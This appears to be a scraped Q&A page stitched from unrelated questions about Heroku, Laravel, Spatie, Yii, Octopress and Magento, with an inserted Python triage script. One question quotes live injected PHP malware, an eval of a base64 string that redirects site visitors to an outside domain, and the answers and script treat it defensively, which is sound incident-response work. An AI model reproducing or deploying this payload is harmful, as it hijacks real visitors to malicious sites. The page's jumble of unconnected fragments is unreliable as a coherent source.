I understand that Heroku removes the .git directory as part of reducing the size of its slug.
Is there a way to disable that?
Related
All my Laravel websites have been infected by a malicious code named aeR4Choc.
It seems to (only???) infect the public/index.php file by redirecting to malicious sites.
Here's the line that can be decoded:
/*aeR4Choc_start*/#eval(base64_decode('aWYoIWRlZmluZWQoImNoYWVKb3U3IikpewogICAgZGVmaW5lKCJjaGFlSm91NyIsIDEpOwogICAgZnVuY3Rpb24gaXNNb2JpbGUoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdhbmRyb2lkJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnYmxhY2tiZXJyeScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwaG9uZScpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2lwYWQnKSAhPT0gZmFsc2UKICAgICAgICAgICAgfHwgc3RycG9zKCR1YWdlbnRTdHIsICdpcG9kJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnb3BlcmEgbWluaScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2llTW9iaWxlJykgIT09IGZhbHNlKXsKICAgICAgICAgICAgcmV0dXJuIHRydWU7CiAgICAgICAgfQogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KCiAgICBmdW5jdGlvbiBpc0Rlc2t0b3AoJHVhZ2VudFN0cil7CiAgICAgICAgaWYoc3RycG9zKCR1YWdlbnRTdHIsICdlZGdlJykgIT09IGZhbHNlIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnbXNpZScpICE9PSBmYWxzZQogICAgICAgICAgICB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ29wcicpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9taXVtJykgIT09IGZhbHNlCiAgICAgICAgICAgIHx8IHN0cnBvcygkdWFnZW50U3RyLCAnZmlyZWZveCcpICE9PSBmYWxzZSB8fCBzdHJwb3MoJHVhZ2VudFN0ciwgJ2Nocm9tZScpICE9PSBmYWxzZSl7CiAgICAgICAgICAgIHJldHVybiB0cnVlOwogICAgICAgIH0KICAgICAgICByZXR1cm4gZmFsc2U7CiAgICB9CgogICAgJHJlZGlyVG8gPSAiaHR0cHM6Ly93d3cucm94b2Vub3MueHl6LyI7CiAgICAkY2hlY2tDb29rUmVkaXJTdHIgPSAiYWVOZWU4cGkiOwogICAgJHJlZGlyZWN0QWxsb3cgPSB0cnVlOwogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tLZXk9PiRjb29rVmFsKXsKICAgICAgICBpZiAoc3RycG9zKCRjb29rS2V5LCAnd29yZHByZXNzX2xvZ2dlZF9pbicpICE9PSBmYWxzZSB8fCAkY29va0tleSA9PSAkY2hlY2tDb29rUmVkaXJTdHIpIHsKICAgICAgICAgICAgJHJlZGlyZWN0QWxsb3cgPSBmYWxzZTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgfQoKICAgICR1YWdlbnQgPSBzdHJ0b2xvd2VyKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7CgogICAgaWYgKCRyZWRpcmVjdEFsbG93KXsKICAgICAgICBpZihpc01vYmlsZSgkdWFnZW50KSB8fCBpc0Rlc2t0b3AoJHVhZ2VudCkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCRjaGVja0Nvb2tSZWRpclN0ciwgIjEiLCB0aW1lKCkgKyA2MDQ4MDApOwogICAgICAgICAgICBoZWFkZXIoIkxvY2F0aW9uOiAkcmVkaXJUbyIpOwogICAgICAgICAgICBkaWU7CiAgICAgI
CAgfQogICAgfQp9'));/*aeR4Choc_end*/
My questions:
How to get rid of it? Just by deleting it?
How did it happen and how can I prevent further attacks?
Thanks!
I would start by restoring the original index.php file from the Laravel install. You can just delete the code, but they may have added more (like a CORS header). Might want to load up a backup from before the hack and run a diff to see what other files were altered.
Check the file permissions on index.php - change it to 644 and change the owner to root and group to www (if you have that group).
If you have debug=true in your .env file you may be open to attack
https://www.ambionics.io/blog/laravel-debug-rce
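The triage steps from the answer above (find the injected block, then diff the site against a pre-compromise backup), as an added example that is not part of the original posts. It assumes the marker name aeR4Choc from the quoted line and a backup tree on disk; the sample files and payload are constructed and harmless, and a decoded payload is only read, never executed.

```python
import base64
import hashlib
import re
import tempfile
from pathlib import Path

MARKER = "aeR4Choc"  # marker name from the infected line quoted in the question

def find_injections(root, marker=MARKER):
    """Return (relative path, decoded payload) for each marker-delimited block."""
    m = re.escape(marker.encode())
    block = re.compile(rb"/\*" + m + rb"_start\*/(.*?)/\*" + m + rb"_end\*/", re.S)
    b64 = re.compile(rb"base64_decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        for found in block.finditer(path.read_bytes()):
            arg = b64.search(found.group(1))
            # Decoded for reading only; the payload is never executed.
            text = base64.b64decode(arg.group(1)).decode("utf-8", "replace") if arg else ""
            hits.append((path.relative_to(root).as_posix(), text))
    return hits

def changed_files(backup, live):
    """Return files under live that are new or differ from the backup tree."""
    def digests(root):
        return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
                for p in Path(root).rglob("*") if p.is_file()}
    old, new = digests(backup), digests(live)
    return sorted(name for name, digest in new.items() if old.get(name) != digest)

def demo():
    # Constructed sample: a harmless payload wrapped like the line in the question.
    payload = base64.b64encode(b'header("Location: https://example.invalid/");')
    clean = b"<?php\nrequire __DIR__.'/../vendor/autoload.php';\n"
    infected = clean.replace(b"<?php\n", b"<?php\n/*aeR4Choc_start*/#eval(base64_decode('"
                             + payload + b"'));/*aeR4Choc_end*/\n")
    with tempfile.TemporaryDirectory() as tmp:
        for tree, index in (("backup", clean), ("live", infected)):
            public = Path(tmp, tree, "public")
            public.mkdir(parents=True)
            (public / "index.php").write_bytes(index)
            (public / "robots.txt").write_bytes(b"User-agent: *\n")
        Path(tmp, "live", "public", "extra.php").write_bytes(b"<?php // constructed added file\n")
        return (find_injections(Path(tmp, "live")),
                changed_files(Path(tmp, "backup"), Path(tmp, "live")))

if __name__ == "__main__":
    print(demo())
```

Files reported by changed_files but not by find_injections are the ones the marker search alone would miss, which is the reason the answer suggests the diff.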
I love this little library - so helpful.
However, it places some of its css and js files in a vendor folder inside the public directory of Laravel. I've got a Vendor class and paths in several apps and so, when saving a new Vendor, it redirects 403 Forbidden due to the conflicted vendor folder in the public directory.
I can't go back and refactor just for this to work, much as I like it.
It comes with a publishable config file, but I don't see an option to change the path to these files to a location outside the vendor folder. I don't want to make changes to the Spatie files, as this would just be overwritten upon next update.
Am I missing something easy here? Any way to get around this?
There isn't currently a config setting that allows you to control this.
The line causing you grief is here - https://github.com/spatie/laravel-web-tinker/blob/master/src/WebTinkerServiceProvider.php#L29. It publishes the compiled assets, as you say, into the public/vendor folder.
If you do not want to refactor your existing work, you can:
PR/fork a change to add this as a config setting
Manually change it on your end (although this could easily break if you ever republished the assets)
Now there is a problem: because I modify CSS or JS files, users must clear their browser cache to get the newest changes. How can I prevent this? I think the best way is to define an assets timestamp; does Yii have something special for this?
I don't understand what this is for. After deploying a new version of the static files to the server, you can clear the assets folder. After this, new assets will be created from the latest version of the files.
I am converting my blog to octopress/jekyll hosted on Heroku.
It all works well locally; however, when loaded up to Heroku I get capitalised URLs that seem to persist across updates and rebuilds of the remote repository.
The posts at locations like mydomain/category/postname contain HTML redirection files to help with the change in URL structure between the previous WordPress domain/category/postname and the default Octopress style domain/yyyy/mm/dd/postname. These are created using the Alias Generator plugin from tsmango.
If I type http://www.williampickup.org/Ceramics/john-dermer into a browser the redirect works, while the lowercase version doesn't. The upper case directory names for categories were an artefact of the original script I used to create the Alias yaml entries in my blog posts. I have fixed that locally; however, I can't seem to upload the correct lowercase directory structure to Heroku.
Eventually I noticed that the directory names were being capitalised when I committed the changes to my git repository.
The solution turned out to be to change the git config setting so that ignorecase = true.
I am working on Magento and trying to make some changes on one of the .phtml files. But my changes never reflect on the web site. I have tried the following things:
Clear Magento cache and delete cache storage
Open the path hint and make sure I am editing the correct file
Go to magento admin panel, System->Configuration->Design, and make sure templates, skin, layout and default folders are correct.
None of the above actions worked. Is there anything else that I could do?
Thanks a lot.
First thing you would want to check is the cache. System > Cache Management. Disable the Layout and Blocks HTML output caches and refresh the frontend page where you've put your changes.
If cache isn't the problem there is a way to find out which template is rendered in a specific location because you may not be editing the correct file.
Go to System > Configuration, select your website from top left Current Configuration Scope, then go to Developer > Debug and set Template Path Hints to Yes.
After this, save your config and refresh the page where you want to modify the .phtml.
If you are working on a live environment make sure not everybody will be able to see the template paths by putting your IP in the Allowed IPs input from Developer Client Restrictions.
After you are finished with this re-enable the cache.